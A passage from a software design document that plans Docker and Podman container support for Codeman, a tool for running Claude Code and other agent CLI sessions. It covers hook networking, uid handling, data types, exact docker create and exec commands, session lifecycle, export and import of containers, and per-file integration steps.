1. Network reachability. Claude Code hooks POST to `$CODEMAN_API_URL` (`curl -sk`). Inside a bridge container `localhost` is the container and prod binds `127.0.0.1`, so we set `--add-host <gatewayAlias>:host-gateway` on create (skipped on Docker Desktop, where the alias is native), add the gateway alias to the host guard, and provide `CODEMAN_API_URL` and the hook secret (below).
|
||||
2. Hook INSTALLATION. Hooks live in `<workspace>/.claude/settings.local.json`, written by the quick-start scaffolding block (around session-routes.ts ~1776) that calls `writeHooksConfig()` / `updateCaseModel()`. The raw plan extended the `!remote` guard to `!remote && !docker`, which would SKIP that block and silently disable ALL hooks regardless of networking. For docker the workspace is a REAL bind-mounted host dir, so the scaffolding block MUST run. Precise fix: extend to `!remote && !docker` ONLY the LOCAL-CLI-availability and local-spawn guards (the ones that stat the local binary or build the local spawn command); leave the workspace-scaffolding guard at `!remote` so it runs for docker. This same decision is what makes `modelOverride` work (Key decision 2). Consequence, surfaced as user-decision 4: linking a docker case now WRITES `.claude/settings.local.json` (and the CLAUDE.md scaffold, matching local-case behavior) into the user's real host directory, a behavioral shift from "link a dir" to "link and scaffold a dir."
|
||||
|
||||
`CODEMAN_API_URL` derivation (the wrong-scheme bug the critic caught): prod is HTTPS-only on 3000, and `server.ts` (~2000) auto-sets `process.env.CODEMAN_API_URL = ${protocol}://${apiHost}:${port}`. Hardcoding `http://host.docker.internal:3000` fails every hook. Instead a pure helper `containerApiUrl(process.env.CODEMAN_API_URL, engine)` parses the running URL and substitutes ONLY the hostname with `hostGatewayAlias(engine)`, preserving scheme and port (`https://host.docker.internal:3000`). Unit-tested against http, https, non-default ports, and both engines. Passed as create-time `--env CODEMAN_API_URL=<derived>` (case-stable, non-secret).
|
||||
|
||||
Hook secret and session attribution:
|
||||
- `~/.codeman/hook-secret` is bind-mounted read-only to a container path; `--env CODEMAN_HOOK_SECRET_FILE=<that path>` is create-time (a path is non-secret; the bytes ride the bind mount and are never committed).
|
||||
- `CODEMAN_SESSION_ID` (which the generated hooks reference at hooks-config.ts:78-80 to attribute events) plus `CODEMAN_MUX=1` are SESSION-scoped, so they are passed at EXEC time via `docker exec --env CODEMAN_SESSION_ID=<id> --env CODEMAN_MUX=1` (non-secret, value inline is fine, and exec env is not committed). Because a `tmux` session started fresh only inherits the invoking env when it starts the SERVER, the launch chain ALSO runs `tmux -L codeman-docker setenv -g CODEMAN_SESSION_ID <id>` (and `CODEMAN_MUX`) so reattaches and newly created panes see the same values. This mirrors how Codeman already injects per-session env into tmux for the external CLIs.
|
||||
|
||||
Hooks-in-MVP-vs-deferred stays user-decision 4; if deferred, docker ships as explicitly hook-degraded and we lean on output-based idle detection through the docker-exec PTY.
|
||||
|
||||
### Key decision 6: uid / HOME / rootless enforcement / macOS Docker Desktop
|
||||
|
||||
The raw plan showed `--user 1000:1000` in one place and `--user "$(id -u):$(id -g)"` in another and never resolved HOME writability; this section fixes all of it.
|
||||
|
||||
- Linux native (docker rootful or rootless): run `--user <hostUid>:0` (host uid, GID 0). The image follows the OpenShift arbitrary-uid convention: `HOME=/home/agent`, and `/home/agent` plus the tool cache dirs (`~/.npm`, `~/.cache`, `~/.config`) are owned `root:0` and group-writable (`chmod -R g+w`, `g+s` on dirs) so a process with GID 0 can write HOME even though its UID is not 1000. This keeps workspace files host-owned (the agent's UID is the host UID) AND keeps HOME writable, so the CLIs actually start.
|
||||
- Podman rootless: use `--userns=keep-id` (maps the host uid to the image's `agent` uid inside the container) instead of `--user`, so `/home/agent` is owned by the running user and workspace files are host-owned. This is a real per-engine branch in `buildDockerCreateArgs`.
|
||||
- macOS Docker Desktop: `--user <macUid>` (e.g. 501) does not own the image's `/home/agent`, so non-bind HOME writes fail EACCES and the CLIs may not start; Desktop also does its own bind-mount uid translation, provides `host.docker.internal` natively (no `--add-host`), and its VM memory ceiling can cap `--memory`. Detect Desktop via `docker info` (Server OS `linuxkit` / `OperatingString` contains "Docker Desktop") and take a dedicated path: do NOT pass `--user` (run as the image's baked `agent` uid and rely on Desktop's translation for workspace access), skip `--add-host`, and note in the UI that memory caps are subject to the VM ceiling.
|
||||
|
||||
Rootless resource-cap enforcement (the silently-inert risk): rootless Docker without cgroup-v2 systemd delegation (`Delegate=yes`) silently IGNORES `--memory`/`--cpus`/`--pids-limit`. The probe checks `docker info` for `CgroupVersion=2` plus rootless plus delegation; if caps cannot be enforced, `checkDockerAvailable` returns `capsEnforced:false` and the link/probe surfaces "resource caps are advisory on this engine." Whether to REQUIRE delegation or ship-with-warning is user-decision 6.
|
||||
|
||||
## 3. Data model
|
||||
|
||||
New TypeScript types in `src/types/session.ts`, added right after the remote types (lines 46-99). SessionMode (line 44) is UNCHANGED.
|
||||
|
||||
```ts
|
||||
export type DockerCommandMode = Extract<SessionMode, 'shell' | 'claude' | 'opencode' | 'codex' | 'gemini'>;
|
||||
export type DockerEngine = 'docker' | 'podman';
|
||||
export type DockerNetworkMode = 'bridge' | 'none' | 'custom'; // never 'host'
|
||||
|
||||
export interface DockerResourceLimits {
|
||||
memory?: string; // '4g' -> --memory 4g --memory-swap 4g (swap==memory: real OOM cap)
|
||||
cpus?: string; // '2'
|
||||
pidsLimit?: number; // 512 (fork-bomb guard)
|
||||
nofile?: string; // '4096:8192'
|
||||
shmSize?: string; // optional; only when a tool needs /dev/shm
|
||||
}
|
||||
|
||||
export interface DockerHost {
|
||||
id: string;
|
||||
label: string;
|
||||
engine?: DockerEngine; // default resolved by probe (docker, else podman)
|
||||
image: string; // default resolved image ref (see user-decision 2)
|
||||
daemonHost?: string; // advanced: -H ssh://user@host / DOCKER_HOST
|
||||
context?: string; // advanced: --context <ctx>
|
||||
network?: DockerNetworkMode; // default 'bridge'
|
||||
networkName?: string; // when network === 'custom'
|
||||
resources?: DockerResourceLimits;
|
||||
mountCredentials?: boolean; // default true (false = sealed; blocks full-image export)
|
||||
hooksEnabled?: boolean; // default true (host-gateway callback wiring)
|
||||
resumeOnStart?: boolean; // default true (see Key decision 1 / user-decision 7)
|
||||
commands?: Partial<Record<DockerCommandMode, string>>;
|
||||
extraCreateArgs?: string[]; // validated like extraSshOptions
|
||||
extraExecArgs?: string[];
|
||||
}
|
||||
|
||||
export interface DockerCase {
|
||||
name: string;
|
||||
type: 'docker';
|
||||
hostId: string;
|
||||
hostWorkspacePath: string; // absolute HOST dir: bind src + Session.workingDir
|
||||
containerWorkdir?: string; // container path; default = hostWorkspacePath (mirror -> projHash match)
|
||||
container?: string; // default codeman-case-<slug>
|
||||
lastClaudeSessionId?: string; // captured resume id (Key decision 1)
|
||||
}
|
||||
|
||||
export interface SessionDocker { // flattened, round-trips through mux/state (mirror SessionRemote at 91)
|
||||
hostId: string;
|
||||
label: string;
|
||||
engine: DockerEngine;
|
||||
image: string;
|
||||
containerName: string;
|
||||
hostWorkspacePath: string;
|
||||
containerWorkdir: string;
|
||||
network: DockerNetworkMode;
|
||||
networkName?: string;
|
||||
resources?: DockerResourceLimits;
|
||||
mountCredentials: boolean;
|
||||
hooksEnabled: boolean;
|
||||
resumeOnStart: boolean;
|
||||
daemonHost?: string;
|
||||
context?: string;
|
||||
commands?: Partial<Record<DockerCommandMode, string>>;
|
||||
extraCreateArgs?: string[];
|
||||
extraExecArgs?: string[];
|
||||
configHash?: string; // drift detection (Key decision, Section 4)
|
||||
}
|
||||
```
|
||||
|
||||
- `SessionState` gains `docker?: SessionDocker` immediately after `remote?` (line 219). It persists automatically because `SessionState` is structural and `state-store.ts` stores `toState()` verbatim.
|
||||
- `src/mux-interface.ts`: add `docker?: SessionDocker` to `MuxSession` (after line 38), `CreateSessionOptions` (after 81), `RespawnPaneOptions` (after 105). `MuxSession.docker` round-trips through `mux-sessions.json` automatically.
|
||||
- `src/types/api.ts` `CaseInfo`: add `'docker'` to the `location` union and a `docker?: { hostId; container; image?; path; network }` display block.
|
||||
- `src/services/unified-session-service.ts`: add a boolean `docker?` flag on `UnifiedSessionItem` and source rows, set from `MuxSession.docker` presence (mirror the `remote` flag at ~line 200 and the harvest at session-routes.ts:2313).
|
||||
|
||||
New state files (all via `dataPath()`, mirroring `remote-hosts.json` / `remote-cases.json`):
|
||||
|
||||
- `~/.codeman/docker-hosts.json` (reusable engine/image/network/resource profiles).
|
||||
- `~/.codeman/docker-cases.json` (`name -> DockerCase`, including `lastClaudeSessionId`).
|
||||
- `~/.codeman/docker-exports/` (dedicated dir for `.image.tar.gz` + `.workspace.tar.gz` + `manifest.json`; never inline in state.json; retention/pruning per Section 5).
|
||||
|
||||
No new `state.json` / `mux-sessions.json` files: `SessionState.docker` and `MuxSession.docker` ride the existing serialization.
|
||||
|
||||
## 4. Container lifecycle (exact command shapes)
|
||||
|
||||
All builders are PURE string functions (directly unit-testable). Host values interpolated into the outer `bash -c "..."` layer (container name, image, workdir, host paths) are `shellescape()`'d and, for user-supplied fields, schema-rejected for `$`/backtick via `NO_SHELL_META`. The escaping chain here is DEEPER than remote's single `ssh '<tmux ...>'`: the whole `docker inspect || docker create <dozens of --mount/--env/shellescaped host paths>` is interpolated into `bash -c "..."` then `JSON.stringify`'d into respawn-pane. This is a known place to get stuck, so it is covered by concrete escaping tests (Section 9), including host workspace paths containing spaces, not just a "we call shellescape" claim.
|
||||
|
||||
New in `src/tmux-manager.ts`:
|
||||
|
||||
```ts
|
||||
const DOCKER_TMUX_SOCKET = 'codeman-docker';
|
||||
// 'dkr' letters deliberately FAIL SAFE_MUX_NAME_PATTERN (^codeman-[a-f0-9-]+$),
|
||||
// so a Codeman running INSIDE the container never adopts/resizes/respawns our session.
|
||||
export function dockerTmuxSessionName(id: string): string { return `codeman-dkr-${id.slice(0, 8)}`; }
|
||||
```
|
||||
|
||||
`buildDockerBaseArgs(docker)` (pure, in `docker-hosts.ts`, mirror of `buildSshConnectionArgs`) emits the engine prefix tokens: `docker` (or `podman`) + optional `--context <ctx>` or `-H <daemonHost>`. `buildDockerCreateArgs(docker, sessionId)` emits the `docker create` flag array (with the per-engine uid/userns branch from Key decision 6).
|
||||
|
||||
IMAGE PRESENCE (before any create, the auto-pull footgun the critic caught): the launch chain runs `docker image inspect <image> >/dev/null 2>&1` first; on miss it exits with a distinct message ("base image <ref> not present: build with scripts/build-agent-image.mjs or pull it") rather than triggering a blocking multi-GB auto-pull inside the tmux pane. `docker create` carries `--pull=never`. The tmux-availability probe likewise uses `docker run --rm --pull=never <image> sh -lc 'command -v tmux'` and reports the same build/pull hint if the image is absent, so the 15s-bounded probe never hangs on a pull.
|
||||
|
||||
CREATE (the ensure step, embedded in the launch string):
|
||||
|
||||
```
|
||||
docker create \
|
||||
--name codeman-case-myproj --hostname myproj \
|
||||
--label codeman.managed=1 --label codeman.instance=<CODEMAN_INSTANCE> \
|
||||
--label codeman.case=myproj --label codeman.session=<id8> \
|
||||
--label codeman.confighash=<hash> \
|
||||
--pull=never --init --restart no \
|
||||
--user 1000:0 \
|
||||
--workdir '/home/arkon/cases/myproj' \
|
||||
--mount type=bind,src='/home/arkon/cases/myproj',dst='/home/arkon/cases/myproj' \
|
||||
--mount type=bind,src='/home/arkon/.claude',dst='/home/agent/.claude' \
|
||||
--mount type=bind,src='/home/arkon/.codeman/hook-secret',dst='/home/agent/.codeman/hook-secret',readonly \
|
||||
--add-host host.docker.internal:host-gateway \
|
||||
--memory 4g --memory-swap 4g --cpus 2 --pids-limit 512 --ulimit nofile=4096:8192 \
|
||||
--cap-drop ALL --security-opt no-new-privileges \
|
||||
--network bridge \
|
||||
--env HOME=/home/agent --env TERM=xterm-256color --env COLORTERM=truecolor \
|
||||
--env CODEMAN_API_URL=https://host.docker.internal:3000 \
|
||||
--env CODEMAN_HOOK_SECRET_FILE=/home/agent/.codeman/hook-secret \
|
||||
codeman/agent:base \
|
||||
sleep infinity
|
||||
```
|
||||
|
||||
- `--user 1000:0` shown is the Linux-native form with GID 0 (Key decision 6); it is actually `--user <hostUid>:0`, or `--userns=keep-id` for podman rootless, or omitted on Docker Desktop. The literal is illustrative only.
|
||||
- Create-time `--env` carries only NON-SESSION, non-secret, case-stable values (safe to be committed): the DERIVED `CODEMAN_API_URL` (https-preserving, Key decision 5) and the hook-secret FILE PATH. `CODEMAN_SESSION_ID`/`CODEMAN_MUX` and the codex/gemini key NAMES are exec-time only.
|
||||
- `codeman.instance=<CODEMAN_INSTANCE>` is REQUIRED on the label set so the boot reaper is instance-scoped (a beta/second instance must never reap prod's containers).
|
||||
- `codeman.confighash` is a stable hash of the drift-relevant create args (image, resources, network, mounts, non-session env). Drift detection (user story 2, the config-never-takes-effect gap): on launch the ensure block compares the desired hash to the existing container's label; on mismatch the launch does NOT silently reuse the stale container. Instead the docker route returns a "container config changed, recreate?" action (SSE + UI confirm), and on confirm Codeman `docker rm`'s and recreates. rm destroys in-image (non-bind) state, but the workspace and transcripts survive on their bind mounts and the conversation is restored via `--resume`, so the recreate is safe. Auto-recreate-vs-prompt is a UI choice; the MVP prompts.
|
||||
- `--restart no` (resolved consistently with Key decision 1; recovery is Codeman's idempotent create-if-missing, not an engine restart policy, which also matters for Podman which has no daemon).
|
||||
|
||||
EXEC (`buildDockerLaunchCommand`, the docker analog of `buildRemoteLaunchCommand`, TTY-correct, resume-aware). The whole thing is ONE `bash -c` string that image-checks, ensures, starts, primes tmux env, then execs:
|
||||
|
||||
```
|
||||
docker image inspect codeman/agent:base >/dev/null 2>&1 || { echo 'Codeman: base image codeman/agent:base not present (build or pull it)'; exit 1; } ; \
|
||||
docker inspect codeman-case-myproj >/dev/null 2>&1 || docker create <all create args above> ; \
|
||||
docker start codeman-case-myproj >/dev/null 2>&1 || { echo 'Codeman: container codeman-case-myproj failed to start (daemon down?)'; exit 1; } ; \
|
||||
exec docker exec -it \
|
||||
--workdir '/home/arkon/cases/myproj' \
|
||||
--env TERM=xterm-256color --env COLORTERM=truecolor \
|
||||
--env CODEMAN_SESSION_ID=1a2b3c4d --env CODEMAN_MUX=1 \
|
||||
--env OPENAI_API_KEY --env GEMINI_API_KEY \
|
||||
codeman-case-myproj \
|
||||
sh -lc 'tmux -L codeman-docker setenv -g CODEMAN_SESSION_ID 1a2b3c4d \; setenv -g CODEMAN_MUX 1 \; new-session -A -s codeman-dkr-1a2b3c4d -c '\''/home/arkon/cases/myproj'\'' '\''cd /home/arkon/cases/myproj && exec claude --dangerously-skip-permissions --resume <claudeSessionId>'\'' \; set -t codeman-dkr-1a2b3c4d status off \; set -t codeman-dkr-1a2b3c4d mouse off \; set -t codeman-dkr-1a2b3c4d prefix C-q \; set -s escape-time 0'
|
||||
```
|
||||
|
||||
- `docker exec -it`: `-t` allocates a PTY and forwards SIGWINCH into the container so the Ink TUI re-lays-out on pane resize; `TERM`/`COLORTERM` prevent degraded rendering. `--env OPENAI_API_KEY` (name only) is present only for codex/gemini and is exec-time (never committed). `CODEMAN_SESSION_ID`/`CODEMAN_MUX` are exec-time values plus a `tmux setenv -g` prime so reattaches and new panes inherit them (Key decision 5).
|
||||
- `--resume <claudeSessionId>` (codex `resume <id>`, gemini `--resume <id>`) is appended to `modeCommand` ONLY when a captured id exists; on first launch it is omitted. `new-session -A` makes the flag inert on a live-tmux reattach and effective only when tmux is re-created (Key decision 1).
|
||||
- `modeCommand = docker.commands?.[mode] || defaultDockerCommandForMode(mode)` (`exec claude --dangerously-skip-permissions`, `exec bash -l`, etc.), with the resume suffix injected by the builder.
|
||||
- Escaping survives every layer identically to remote in shape but deeper in nesting: `paneCommand` (`cd ... && exec ...`) is one shellescaped tmux arg, the whole `tmuxInvocation` is one shellescaped `sh -lc` arg, and the outer string is `JSON.stringify()`'d into `bash -c` by respawn-pane (tmux-manager.ts:1329).
|
||||
|
||||
Wire-up (extend the two existing seams to 3-way):
|
||||
|
||||
- createSession (tmux-manager.ts:1276): `const fullCmd = docker ? buildDockerLaunchCommand({ mode, docker, sessionId, resumeSessionId }) : remote ? buildRemoteLaunchCommand({ mode, remote, sessionId }) : localFullCmd;`
|
||||
- launchCmd cd-skip (tmux-manager.ts:1327): `const launchCmd = (remote || docker) ? fullCmd : \`cd ${JSON.stringify(workingDir)} && ${fullCmd}\`;`
|
||||
- respawnPane: same two edits at lines 1524 and 1542.
|
||||
|
||||
START / reattach-after-reboot: the ensure block (image-check, `docker inspect || docker create`, `docker start`) is fully idempotent, so boot recovery just re-runs `buildDockerLaunchCommand` from the restored `MuxSession.docker` with the persisted resume id. A rebooted host recreates the container and resumes the conversation.
|
||||
|
||||
DOCKER-DOWN surfacing (the PTY-exit-breaker false-trip risk): if `docker start` or `docker exec` cannot attach (daemon down, container missing), the launch prints a docker-specific message and exits, which alone would still count toward `session-pty-exit-breaker` and show a generic "respawn breaker tripped" push. To avoid masking the cause, the docker reattach path runs a fast `checkDockerAvailable` pre-flight: if the daemon/container is unreachable, Codeman broadcasts a docker-specific error (SSE + push, "container <name> is not running / daemon down") and SKIPS the auto-reattach that would trip the breaker, rather than fast-looping `docker exec`.
|
||||
|
||||
STOP / KILL (`killSession` Strategy 3c, right after remote's Strategy 3b at tmux-manager.ts:1719, guarded by `IS_TEST_MODE`):
|
||||
|
||||
```ts
|
||||
if (session.docker) {
|
||||
// best-effort, fire-and-forget, timeout-bounded so it never blocks the local kill
|
||||
execAsync(buildDockerKillCommand({ docker: session.docker, sessionId }), { timeout: EXEC_TIMEOUT_MS }).catch(() => {});
|
||||
}
|
||||
```
|
||||
|
||||
`buildDockerKillCommand` emits: `docker exec codeman-case-<slug> tmux -L codeman-docker kill-session -t codeman-dkr-<id8> ; docker stop -t 10 codeman-case-<slug>`. Stopping frees CPU/RAM and, per Key decision 1, is safe for conversation continuity because the NEXT launch resumes from the bind-mounted transcript via `--resume`. Whether to stop at all (RAM vs instant live-agent reattach) is user-decision 6/1 (reframed honestly). The bind-mounted workspace and transcripts always survive on the host.
|
||||
|
||||
REMOVE: only on explicit case delete (`docker rm -f codeman-case-<slug>`), gated behind an "export first?" UI prompt because rm destroys any in-image (non-bind) state. Instance-scoped boot reaper (fixing the racy/cross-instance reaper): after `docker-cases.json` is loaded AND after `restoreMuxSessions` has run, enumerate `docker ps -a --filter label=codeman.managed=1 --filter label=codeman.instance=<CODEMAN_INSTANCE> --format '{{.Names}}\t{{index .Labels "codeman.case"}}'` and `docker rm -f` only containers whose case is gone from THIS instance's `docker-cases.json`. The instance filter is what stops a beta reaping prod's containers (the exact cross-instance hazard the project memory warns about).
|
||||
|
||||
AVAILABILITY PROBE (`docker-hosts.ts`, timeout-bounded like `checkRemoteTmuxAvailable`'s 15s, `IS_TEST_MODE` no-op):
|
||||
|
||||
```
|
||||
docker info --format '{{json .}}' # server up, CgroupVersion, rootless, OS (Desktop detect), cap-delegation
|
||||
docker image inspect <image> --format '{{.Id}}' # image PRESENT (no auto-pull)
|
||||
docker run --rm --pull=never <image> sh -lc 'command -v tmux' # tmux-in-image gate (hard prerequisite), only if image present
|
||||
```
|
||||
|
||||
`checkDockerAvailable()` returns `{ ok, engine, rootless, isDesktop, cgroupV2, capsEnforced }` (parse `SecurityOptions` for `name=rootless`, `CgroupVersion`, delegation, and Server OS for Desktop). `checkDockerTmuxAvailable(host)` returns a structured result with a user-facing error and correct install hint (NOT `npm install -g`; the hint is "build/pull the base image" for a missing image and "install docker or podman" for a missing engine).
|
||||
|
||||
IN-CONTAINER CLI VERSION (fixing the #154 wheel-forwarding regression): the raw plan skipped the LOCAL `cliVersion` probe for docker (correct, since it reports the HOST claude) but left `cliVersion` undefined, which disables trackpad wheel-forwarding. Instead, for docker sessions Codeman runs an IN-CONTAINER probe `docker exec <container> claude --version` (bounded, `IS_TEST_MODE` no-op) and feeds THAT into `cliVersion`. This also means a stale baked CLI is visible; combined with the rebuild-cadence in user-decision 2, agents are not silently pinned to an old claude.
|
||||
|
||||
## 5. Export / Import
|
||||
|
||||
EXPORT is a concurrency-bounded job (reuse `runWithConversionLimit` from `document-conversion-limiter.ts` so N simultaneous exports cannot fork-bomb the host). Route `POST /api/docker-cases/:name/export`.
|
||||
|
||||
Preconditions (the consistency and leak risks the critic caught):
|
||||
- Sealed guard: if `mountCredentials:false`, full-image export is REFUSED unless the caller explicitly opts into the pre-commit scrub (Key decision 2). Workspace-only export is always allowed.
|
||||
- Quiesce + free-space: require the session idle, then `docker pause` the container spanning BOTH the workspace tar AND the commit so the two artifacts are mutually consistent (the raw plan paused only the commit, leaving the bind-mount tar to run against a mid-write agent). Before any heavy step, precheck free space in the exports dir and in `/var/lib/docker`; if below `DOCKER_EXPORT_MIN_FREE_BYTES`, refuse with a clear error (a full `/var/lib/docker` wedges the daemon and breaks EVERY session on the host).
|
||||
|
||||
Steps (all cleanup in try/finally so a mid-way failure never orphans an intermediate image or leaves the container paused):
|
||||
|
||||
1. `docker commit -c 'LABEL codeman.exported=1' codeman-case-<slug> codeman/export-<slug>:<ts>` (unique tag per export defeats the stale-image trap). Optional pre-commit scrub in sealed mode as above; also blank instance-specific committed env (`-c 'ENV CODEMAN_API_URL='` etc.) so the image carries no stale host references.
|
||||
2. `docker save codeman/export-<slug>:<ts> | gzip` streamed in fixed 8192-byte chunks to `~/.codeman/docker-exports/<slug>-<ts>.image.tar.gz`. Uses `docker save` (layers + repo:tag + CMD), never `docker export` (flat rootfs), so restore is a trivial `docker load`.
|
||||
3. `tar --numeric-owner -C <hostWorkspacePath> -czf <slug>-<ts>.workspace.tar.gz .` while paused (the bind-mounted workspace is NOT in the image, so it travels separately and consistently).
|
||||
4. Write `manifest.json`: schema version, caseName, image tag, engine, containerWorkdir, resource/network config, codeman version, base-image digest, createdAt, per-member sha256, `mountCredentials`, and `secretFree` (true only for convenient-mode or scrubbed-sealed exports).
|
||||
5. `docker rmi codeman/export-<slug>:<ts>` in the `finally` (delete the intermediate committed image regardless of success), then `docker unpause`.
|
||||
|
||||
The three files are wrapped in one bundle `<slug>-<ts>.codeman-container.tgz` and offered as a downloadable artifact through the existing file-routes streaming + attachment-registry handoff.
|
||||
|
||||
Retention / disk budget (user-decision 3): `docker-exports/` is capped at `DOCKER_EXPORT_KEEP` most-recent bundles with an auto-prune on each new export, plus the free-space precheck above. Workspace scrub: the WORKSPACE tar gets a scan/warn pass for agent-created `.env` / `.git/credentials` (a distinct leak channel from container creds). A lighter "workspace-only" export (just the workspace tar, no commit/save) is the fast default for 24h+ runs; full-image is the explicit heavier option (user-decision 7 in the original list, now decision on the default button below).
|
||||
|
||||
What travels: the baked toolchain image plus any in-image writes, and the workspace tar. What does NOT travel: bind-mounted credentials (physically excluded from commit) and anything that lived only in a bind mount. Secret-free by construction in convenient mode, and enforced (refuse-or-scrub) in sealed mode.
|
||||
|
||||
IMPORT `POST /api/docker-cases/import` (untrusted-bundle containment, the traversal/overwrite risk): stream the uploaded bundle, validate every manifest checksum BEFORE any extraction or load. Extract the workspace tar with `tar --no-absolute-names -C <fresh dir>` PLUS per-entry validation rejecting any member whose normalized path escapes the destination (leading `/` or `..` components). `gunzip | docker load` the image, then RE-TAG the loaded image id into a quarantined namespace `codeman/imported-<slug>:<ts>` and NEVER allow the load to overwrite `codeman/agent:base` or any pre-existing tag (capture the loaded id, ignore the bundle's repo:tag). Create a NEW `DockerCase` pointing at the quarantined image with THIS host's mounts/creds and the manifest's resource/network config, and recreate the container hardened (cap-drop ALL, no-new-privileges, non-root, `--pull=never`, CMD overridden to `sleep infinity`). The destination supplies its own login, so credentials never cross machines. Plus `GET /api/docker-exports` (list) and `DELETE /api/docker-exports/:filename`, all behind Codeman's existing auth / loopback-default / host-guard / Origin-CSRF stack.
|
||||
|
||||
## 6. Codeman integration (file-by-file, mirroring the remote-SSH feature)
|
||||
|
||||
- `src/types/session.ts`: add `DockerCommandMode`, `DockerEngine`, `DockerNetworkMode`, `DockerResourceLimits`, `DockerHost`, `DockerCase`, `SessionDocker` (Section 3). Add `docker?: SessionDocker` to `SessionState` after line 219. SessionMode (line 44) UNCHANGED.
|
||||
- `src/mux-interface.ts`: add `docker?: SessionDocker` to `MuxSession` (38), `CreateSessionOptions` (81), `RespawnPaneOptions` (105).
|
||||
- `src/docker-hosts.ts` (NEW, direct mirror of `src/remote-hosts.ts`): `readDockerHosts`/`writeDockerHosts`/`readDockerCases`/`writeDockerCases` (via `dataPath`, including `lastClaudeSessionId` read/write), `defaultDockerCommandForMode` (mirror line 60), `dockerDisplayPath` (`container:/path`, mirror `remoteDisplayPath` at 205), `toSessionDocker(host, case)` (mirror `toSessionRemote` at 212), `buildDockerBaseArgs`/`buildDockerCreateArgs` (per-engine uid/userns branch), `hostGatewayAlias(engine)`, `containerApiUrl(processApiUrl, engine)` (scheme+port-preserving, unit-tested), `checkDockerAvailable`/`checkDockerTmuxAvailable`/`probeDockerCliVersion` (15s-bounded, `IS_TEST_MODE` no-op), a config-hash helper for drift, its own POSIX `shellescape` copy (mirror line 83). `const IS_TEST_MODE = !!process.env.VITEST;` gates every real `docker` invocation.
|
||||
- `src/tmux-manager.ts`: add `DOCKER_TMUX_SOCKET`, `dockerTmuxSessionName`, `buildDockerLaunchCommand` (resume-aware, image-check, env-prime), `buildDockerKillCommand` (Section 4). Extend the two `fullCmd` ternaries (1276, 1524) and the two `launchCmd` cd-skips (1327, 1542). Add `killSession` Strategy 3c after 1719. Ensure `reconcileSessions` (~1800-1815) does NOT hard-delete docker sessions on local-tmux death (recovery relaunch path).
|
||||
- `src/session.ts`: add `_docker?: SessionDocker` field (mirror `_remote` at 403), constructor arg (477), assignment (550). Thread `docker: this._docker` and `resumeSessionId: this._claudeSessionId` into BOTH `createSessionOptions` and `respawnPaneOptions` in `startInteractive` (1352/1370) and the second path (1740/1750). Emit `docker: this._docker` in `toState()` (1010). Replace the LOCAL cliVersion probe at 1320 for docker with the IN-CONTAINER `probeDockerCliVersion` (do not merely skip it). Extend `resolveMuxAttachCwd(workingDir, remote, docker)` (215) to return `/tmp` when `docker` is set. On claudeSessionId capture, persist it to the owning `DockerCase.lastClaudeSessionId`.
|
||||
- `src/web/server.ts`: in `restoreMuxSessions` (2160), add `docker: muxSession.docker ?? savedState?.docker` to the `new Session({...})` call (2195-2216), and skip docker in the same `isExternalCliMode`/Ralph recovery guards as remote. Register the instance-scoped boot reaper to run AFTER docker-cases load and AFTER `restoreMuxSessions`. Ensure `CODEMAN_API_URL` derivation reads the SAME `process.env.CODEMAN_API_URL` the server sets at ~2000.
|
||||
- `src/web/schemas.ts`: add `DockerHostSchema` and `DockerCaseLinkSchema` (below). The three mode enums (177/373/705) and `QuickStartSchema` (368) UNCHANGED (docker resolves by `caseName` lookup like remote).
|
||||
- `src/web/routes/session-routes.ts`: import the docker helpers from `../../docker-hosts.js`. Add a docker branch in `/api/quick-start` parallel to the remote branch (1686-1720): `readDockerCases` -> find by `caseName` -> `readDockerHosts` -> find by `hostId`; reject `envOverrides`/`effort`/`codexConfig`/`geminiConfig`/`openCodeConfig` (but ACCEPT `modelOverride`, which flows via scaffolded `settings.local.json`); run `checkDockerAvailable` + `checkDockerTmuxAvailable` (image-present, engine, caps-enforced); surface `capsEnforced:false` and Desktop notes; set `casePath = dockerCase.hostWorkspacePath` (REAL host dir), `docker = toSessionDocker(host, dockerCase)`, and seed `resumeSessionId` from `dockerCase.lastClaudeSessionId` when `resumeOnStart`. Extend the LOCAL-availability and local-spawn guards (around 1796/1810) to `!remote && !docker`, but DO NOT extend the workspace-scaffolding guard (~1776, `writeHooksConfig`/`updateCaseModel`), which MUST run for docker. Pass `docker` into `new Session` (1847); `autoConfigureRalph` (1853) gated on `!docker`. Add `docker: m.docker !== undefined ? true : undefined` to the unified harvest (2313).
|
||||
- `src/web/routes/case-routes.ts`: import the docker read/write/check helpers + schemas. Add a docker listing loop in `GET /api/cases` (mirror 94-119, `location: 'docker'`, `docker: {...}` via `dockerDisplayPath`). Add `/api/docker-hosts` GET/POST/PUT/DELETE (mirror 168-204) and `POST /api/cases/docker-link` (mirror 206-232; run `checkDockerAvailable`/`checkDockerTmuxAvailable` at link time; broadcast `CaseLinked` with `type: 'docker'`). Add a docker-unlink branch to `DELETE /api/cases/:name` (mirror 288-296; `docker rm -f`; broadcast `CaseDeleted` `type: 'docker-unlinked'`). Add the docker branch to single-case `GET` (mirror 358-368). Add `POST /api/docker-cases/:name/export`, `/import`, `GET/DELETE /api/docker-exports`, and a `POST /api/docker-cases/:name/recreate` (drift confirm) per Sections 4 and 5.
|
||||
- `src/web/sse-events.ts` + `src/web/public/constants.js`: reuse `CaseLinked`/`CaseDeleted` for CRUD. Add `docker:exportProgress`, `docker:exportComplete`, `docker:importComplete`, `docker:configDrift`, and `docker:containerError` to BOTH registries (kept in sync per CLAUDE.md).
|
||||
- Frontend `src/web/public/index.html` (~1831): add a Docker `modal-tab-btn` next to Remote; add a `#case-docker` panel mirroring `#case-remote` with `dockerCaseName`, `dockerHostWorkspacePath`, `dockerContainer`, `dockerImage`, `dockerHostId`, and an Advanced `<details>` for network mode, resource caps, `mountCredentials`, `resumeOnStart`, and remote daemon. Surface a "scaffolds .claude into this host dir" note (user-decision 4) and a "resource caps advisory on this engine" warning when `capsEnforced:false`.
|
||||
